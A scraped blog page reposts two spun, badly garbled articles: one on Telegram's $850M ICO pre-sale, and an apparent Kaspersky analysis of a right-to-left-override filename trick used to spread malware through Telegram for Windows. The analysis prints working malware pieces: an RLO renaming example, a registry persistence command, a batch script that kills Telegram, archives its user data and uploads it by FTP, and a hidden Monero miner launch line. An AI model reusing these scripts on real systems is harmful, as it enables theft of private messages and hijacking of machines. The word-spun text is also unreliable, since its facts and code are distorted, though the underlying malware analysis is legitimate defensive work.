Telegram has raised an preliminary $850M for its billion-greenback ICO

No Comments

Telegram has raised an preliminary $850M for its billion-greenback ICO



It looks to be to be aforementioned fuck Telegram’s billion-greenback ICO has reached its prototypal milestone after the chitchat app concern upraised an origin $850 million, essentially essentially supported on a filing.

A file submitted to the SEC primeval this hebdomad states that the change utilised to be upraised “for the ornament of the TON Blockchain, the ornament and repairs of Telegram Messenger and the mixed functions.” The country is described as “decide agreements for cryptocurrency” and the filing is subscribed by Telegram CEO Pavel Durov.

This origin assets is in every probability the pre-sale initiate of the ICO which, as TechCrunch reported on widely terminal month, utilised to be convergent at assignment top firms and maturity figures in the assets community who were presented unfathomable discounts to create up Telegram’s Gram token. The pre-sale utilised to be prototypal and important convergent at upbringing $600 million, nonetheless communicate pushed the turn up to $850 million, basically essentially supported on a Bloomberg narrative.

Telegram prototypal and important designed to compound a player $600 meg to acquire its TON send by move of a unstoppered understanding that begins in March, essentially essentially supported on documents seen by TechCrunch, nonetheless it indubitably relic to be seen whether that turn shall be adjusted. Bloomberg previously advisable the coverall unstoppered understanding surroundings would create large to $1.15 billion, transfer the turn upraised to practically $2 1000000000 if a hit.

Telegram CEO Durov unsuccessful to respond to an emailed ask for statement at the instance of writing.

Both diagram, the understanding guarantees to be the faithful ICO seen to this level. The pre-sale turn on my possess tops every mixed ICOs held by whatever margin.


The understanding represents the prototypal right assets in Telegram, which has been self-funded by Durov and his senior brother Nikolai, who supported VKontakte, the ethnic networking apprize assuredly assuredly famous as ‘Russia’s Fb.’ The duo fled country in 2014 after a tumble-out with investors, who they perplex had course to the federal government, and they also after apprize up Telegram.

Question around the minimal understanding has been unprecedented, essentially thanks to Telegram’s actual difficulty within the crypto neighborhood. Its messaging app is nonexistent by practically every of ICO projects, with its community feature specially ordinary amongst crypto watchers — that entails more shadowy parts equivalent to ‘pump and dump’ scammers.

Quartz not likewise prolonged past reported that pre-sale investors are commerce their portion for upwardly of threefold the price, patch others had stayed a structure from the understanding discover of caution. There has indubitably been hype, with a bevy scammers establishing fictitious acquire sites and campaigns to be taught on the fervour, as TechCrunch wrote terminal month.

As for the send itself, Telegram is aiming to acquire a program of services and products alongside its messaging app, including:

  • Distributed enter hardware the aforementioned to services and products fuck Dropcoin and ICO concern Filecoin
  • A agent assist for ascension localised VPN services and products and TOR-love steady feeding environments conformable with the blockchain
  • Services and products for localised apps, delightful contracts and localised acquire feeding experiences
  • Funds for micropayments and note-to-note transactions

An primeval ‘MVP’ help of TON is regular for unstoppered in Q2 2018 with the Telegram pockets assist draw for the terminal lodge of the 365 days. Beyond that, its TON services and products are designed to unstoppered in 2019 nonetheless Telegram is unhearable to acquire the inexplicit skills that it claims module enable them.

Despite that, it has been laboring transport concern goods this 365 days.

Earlier this month, Telegram launched concern variations of its messaging apps for Android and iOS, modify supposing its apps were hurried distant for download by Apple after some users were came crossways to be distribution female pornography on them. The concern moreover launched a acquire pace-in allowing agencies to tie with users by move of the messaging app.

Demonstrate: The creator owns a time turn of cryptocurrency.

Be taught Extra

Telegram has raised an preliminary $850M for its billion-greenback ICO

Telegram has raised an preliminary $850M for its billion-greenback ICO

Telegram has raised an preliminary $850M for its billion-greenback ICO

hackers, preliminary, raised, tech, technology, telegram
hackers, preliminary, raised, tech, technology, telegram

Zero-day vulnerability in Telegram

No Comments

Zero-day vulnerability in Telegram


In Oct 2017, we realized of a danger in Telegram Messenger’s Home windows machine that denaturized into erst existence misused within the wild. It entails utilizing a tralatitious superior-to-left override move when a mortal sends accumulation over the traveller carrier.

True-to-left override in a nutshell

The portion nonprinting superior-to-left override (RLO) personality is fraudulence to alter the provide an account for of the characters that nearby after that personality within the string. In the Unicode personality desk, it is represented as ‘U+202E’; digit ready of consonant ingest is when typewriting Semite text. In an attack, this personality strength most sure substantially modify be fraudulence to verify the sufferer. It’s on the flooded fraudulence when displaying the denomination and spreading of an workable file: a lowercase taste of helper disposed to this category of move module move the name incompletely or in reverse.

Launching an move on Telegram

Below is an fable of how this danger denaturized into erst misused in Telegram:

    • The cybercriminal prepares the malware to be dispatched in a message. As an instance, a JS enter is renamed as follows:

defective.js -> photo_high_re*U+202E*gnp.js
The ready *U+202E* is the RLO personality to amend Telegram move the effort progress gnp.js in reverse. Prove that this activeness would today not move the precise enter – it tranquil has the spreading *.js.

  • The assailant sends the message, and – shock! – the acquirer sees an inbound PNG represent enter as a deciding of a JS file:




  • When the mortal clicks on this file, the fashioned Home windows section asking is displayed:



Importantly, this asking is handiest displayed if it hasn’t been unfit within the system’s settings. If the mortal clicks on ‘Dawdle’, the vindictive enter is launched.

Exploitation within the wild

After uncovering discover the vulnerability, we started to see cases where it denaturized into erst in saucer of actuality exploited. These cases modify into a sort of fashioned scenarios.

Far soured regulate

The plan of this category of move is to poverty ordered of the sufferer’s system, and entails the assailant uncovering discover the intend system’s condition and the ordered up of added modules.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field stage, a downloader is disbursed to the aim, which is cursive in .Rep, and uses Telegram API as the provide an account for protocol:


With this minimal and API, it is cushy to see discover the Telegram bot by aptitude of which the septic programs are managed:


When launched, it modifies start registry key to concoct enduringness on a grouping and copies its workable enter into digit in every the directories, relying on the ambiance:


Then it begins to effort every digit seconds for manual effort again from the ordered bot. Prove that the manual are implemented in Russian:


The itemize of based manual reveals that the bot crapper silently deploy capricious vindictive tools verify tending of backdoors, loggers and another malware on the intend system. A rank itemize of based manual is presented under:

(English translation)
Ship itemize of accumulation in directory to cook bot.
Launch workable enter utilizing Route of.Open().
Take a countenance at if tor job is running, obtain, verify it, withdraw the deposit and play up its content.
Net enter into its comprise directory.
Delete enter from its comprise directory.
Unpack deposit in its comprise directory utilizing given password.
Terminate given employ utilizing job.Cancel()
Connected as ‘Net’ (peep above), with mixed provide an account for parsing.
Connected as ‘Launch’ (peep above), with mixed provide an account for parsing.
Connected as ‘Delete’ (peep above), with mixed provide an account for parsing.
Connected as ‘Unpack’ (peep above), with mixed provide an account for parsing.
Ship a checklist of manual streaming on instruction PC to cook bot.

An psychotherapy of these manual reveals that this dockhand module most probable be fashioned to obtain but some another example of malware, most sure a logger that module most sure substantially look on the unfortunate person.

Miners and extra

Amid the cryptocurrency allege, cybercriminals are progressively agitated absent from ‘traditional robbery’ to a sort extraordinary machine of making change from their victims – specially defence cryptocurrency utilizing the sources of an septic computer. All they staleness concoct is walk a defence machine on the unfortunate machine and verify the aggregation of their cryptocurrency pockets.

Space #1

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field initiate of the attack, an SFX deposit with a playscript is fraudulence that launches an workable file:


This mosey.exe file is really a BAT file. The collection script, after extraction, looks verify tending of this:


As we are in a function to peep, the vindictive aggregation prototypal opens a cheater enter – on this housing it is an represent to silence the unfortunate faithful into a simulated significance of security.

Then, digit miners play up digit after the opposite. They’re launched as providers with the abet of the nssm.exe utility, which module most probable be contained within the aforementioned SFX archive.

  • nheq.exe: an Equihash jack for NiceHash (on this inform case, it mined Zcash). Can ingest the sources of both the mainframe and graphics accelerator:
  • taskmgn.exe – but some another smartly-liked jack enforcing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a identified inform progress with pdb path:

We comprise seen a sort of variations of this collection script, a unify of of which comprise added components:


This inform edition disables Home windows section components, then logs on to a vindictive protocol server, downloads a explosive and launches it. In this case, the explosive denaturized into erst an SFX deposit that incorporates but some another miners and a Far soured Manipulator Procedure (RMS) client, an similarity of TeamViewer. The practice of AutoIt scripts, the malware deploys RMS on the convergent machine for ensuant extreme access:


The move flowchart is roughly as follows:


We comprise examined this protocol machine and institute a sort of player kindred payloads, which are most sure unexploded by another variations of this malware.


The enter address4.exe is sufficiency of a mixed mention. Love the oppositeness data, it is an SFX deposit with the incoming contents:


All components titled st*.exe are workable PE accumulation transformed in a kindred intention from collection scripts.

The SFX playscript launches the surroundings st1.exe:


st1.exe provides st2.exe to the grouping start by composition the precise enter to the grouping registry:

reg add HKEY_CURRENT_USERSOFTWAREMicrosoftHome windowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f

So the st2.exe enter launches when grouping is booted ensuant time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to play up
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%sss
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory faithful into a RAR archive
ping -n 1 |>nul bonded /i “TTL=” && (originate “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :originate) #Checks Net unification and launches st3.exe

As anticipated, st3.exe logs on to the vindictive protocol machine and uploads the RAR deposit that denaturized into erst created earlier:

@echo XXXXXXXX>give an account for.txt
@echo XXXXXXXX>>give an account for.txt
@echo binary>>give an account for.txt
@echo mput %temp%sss*.rar>>give an account for.txt
@echo stop>>give an account for.txt
ftp -s:give an account for.txt -i
del provide an account for.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H

On that protocol server, we institute a sort of deposit of this category containing Telegram directories taken from the victims:


Every shitting incorporates, as substantially to the Telegram client’s executables and programme data, an encrypted topical store containing mixed accumulation fraudulence in inland most communications: documents, movies and frequence accumulation and photos.

Space #2


Appropriate verify tending of within the preceding scenario, an move begins with an SFX deposit inaugural and actuation a VBScript that it incorporates. Its vital employ is to play up a cheater represent to disconcert the person, after which obtain and play up the payload:


The explosive is an SFX deposit with the incoming script:


svchost.vbs is a playscript controlling the play up of the jack CryptoNight (csrs.exe). It shows the obligation list; if it detects a naming programme (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s employ and re-launches it when the obligation programme is closed.

The playscript incorporates the precise comments:


The jack itself is launched as follows:

WshShell.Dawdle “csrs.exe -a cryptonight -o stratum+tcp:// -u -p x -dbg -1″ & cores, zero

The bet come is related with the cryptocurrency Monero.

On the machine itself, as substantially to to the given explosive data, we institute kindred SFX deposit with miners:



It looks that handiest Slavonic cybercriminals comprise been semiconscious most this vulnerability, with every of the utilization cases that we perceived attractive locate in Russia. Also, whereas conducting a careful see of these assaults we institute a clump of artifacts that spinous to status by Slavonic cybercriminals.

We don’t comprise comely aggregation most how prolonged and which variations of the Telegram products comprise been untidy with the vulnerability. What we concoct undergo is that its utilization in Home windows customers started in March 2017. We told the Telegram builders of the world, and the danger no individual occurs in Telegram’s products.

This essay items handiest those cases that comprise been reportable by Kaspersky Lab’s telemetry programs. The fat orbit and another techniques of utilization springy unknown.



First stage




C2 servers




Learn More

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

hackers, tech, technology, telegram, vulnerability
hackers, tech, technology, telegram, vulnerability